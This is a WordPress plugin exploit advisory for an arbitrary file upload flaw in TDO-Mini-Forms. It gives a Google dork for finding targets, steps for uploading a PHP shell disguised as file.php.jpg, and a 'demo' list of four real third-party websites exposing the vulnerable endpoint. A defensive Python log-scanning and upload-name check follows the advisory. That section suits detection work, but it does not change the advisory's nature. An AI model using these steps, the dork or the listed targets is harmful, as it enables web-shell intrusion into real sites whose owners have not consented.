###############################################################
# Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor Homepage: http://thedeadone.net
# Software Link : http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip
# Google dork: inurl:/wp-content/plugins/tdo-mini-forms/
# Tested on: Windows/Linux
###############################################################

1) Exploit :
= = = = = =

1. Go to http://[target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index=
2. Click Browse and select your shell script (e.g. file.php.jpg)
3. Click "Upload Now" to upload

# Uploaded files : http://127.0.0.1/wp-content/uploads/tdomf/tmp/[FormID]/[YourIP]/file.php.jpg

2) Exploit demo :
= = = = = = = = =

http://moiatadieta.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://100mostbeautifulbabies.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://pawsintograce.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://activeyouth.co.uk/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #
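A defender-side detection check, added here as an example and not part of the original advisory or the plugin's code: it scans web-server access-log lines for requests to the inline upload endpoint named above and for fetches from the plugin's tdomf tmp directory whose file name carries an executable extension in any position (the file.php.jpg pattern the advisory relies on). The same name check doubles as an upload-policy test a site could apply before accepting a file. The endpoint and upload paths are the ones the advisory gives; the log lines, IP addresses, extension sets and function names are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Extensions a PHP-enabled web server may execute. Any of these anywhere in the
# name (e.g. "file.php.jpg") is rejected, not only as the final extension, because
# Apache's AddHandler-style multi-extension matching can run such a file as PHP.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Extensions a form-upload feature for images/documents legitimately needs (assumed policy).
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf"}


def is_safe_upload_name(filename: str) -> bool:
    """True only if the name ends in an allowed extension and carries no executable
    extension in any position. Directory components are discarded first."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension at all, or a dot-file such as ".htaccess"
    exts = parts[1:]
    if any(ext in EXECUTABLE_EXTS for ext in exts):
        return False
    return exts[-1] in ALLOWED_EXTS


# Common/combined log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Paths taken from the advisory.
UPLOAD_ENDPOINT = "/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php"
TMP_UPLOAD_DIR = "/wp-content/uploads/tdomf/tmp/"


def find_suspicious_requests(log_lines):
    """Return (ip, reason, request path) tuples for hits on the inline upload endpoint
    and for files served from the tdomf tmp directory that fail is_safe_upload_name()."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path = m.group("path")
        path = urlparse(raw_path).path  # strip the query string before matching
        if path.endswith(UPLOAD_ENDPOINT):
            findings.append((m.group("ip"), "request to tdomf inline upload endpoint", raw_path))
        elif TMP_UPLOAD_DIR in path and not is_safe_upload_name(path.rsplit("/", 1)[-1]):
            findings.append((m.group("ip"), "executable-looking file served from tdomf tmp dir", raw_path))
    return findings


# Constructed sample log lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2013:10:01:02 +0000] "POST /wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2013:10:01:09 +0000] "GET /wp-content/uploads/tdomf/tmp/1/203.0.113.7/file.php.jpg HTTP/1.1" 200 88',
    '198.51.100.4 - - [12/Sep/2013:10:02:15 +0000] "GET /wp-content/uploads/2013/09/holiday.jpg HTTP/1.1" 200 4096',
    '198.51.100.4 - - [12/Sep/2013:10:02:16 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, reason, path in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: {reason}: {path}")
```

Two of the four constructed lines are flagged: the POST to the upload endpoint and the later fetch of file.php.jpg from the tmp directory, both from the same client. Rejecting on any executable extension rather than only the last one is the point of the name check; a final-extension-only test would accept exactly the double-extension name the advisory uses. Where the upload directory must remain web-reachable, disabling script execution for it at the web-server level is the complementary control.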